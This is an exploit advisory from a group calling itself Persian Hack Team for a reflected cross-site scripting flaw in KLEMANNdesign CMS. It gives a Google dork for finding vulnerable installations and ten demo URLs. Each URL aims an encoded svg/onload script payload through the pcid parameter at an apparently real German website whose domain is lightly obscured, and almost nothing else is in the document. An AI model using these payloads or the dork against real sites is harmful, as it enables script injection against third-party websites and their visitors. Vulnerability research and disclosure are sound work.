######################
# Exploit Title : KLEMANNdesign CMS XSS Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.klemanndesign.biz/
# Google Dork : intext:CMS - KLEMANNdesign.biz & inurl:index.php?
# Date: 2015/11/23
#
######################
#
#
#Demo:
#
#http://gbr.hugo-ackerXmann.de/index.php?pcid=8%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=18
#http://www.ssniff.coXm/index.php?pcid=9%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=14
#http://www.murascXh-reisen.de/index.php?pcid=8%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=14&fnid=11
#http://www.bmw-Xveteranenclub.de/index.php?pcid=16%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=98
#http://www.rhg-Xtecklenburger-land.de/index.php?pcid=1%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=1
#http://www.drkX-aa-te.de/index.php?pcid=171%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=371
#http://www.drXk-mettingen.de/index.php?pcid=164%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=360
#http://www.aXws-heinert.de/index.php?pcid=15%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=14
#http://www.Xgroeger-bau.de/index.php?pcid=35%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=145
#http://ruhrXblitz.de/index.php?pcid=2%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28/MobhaM/%29%3Eweb&pdid=19
#
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################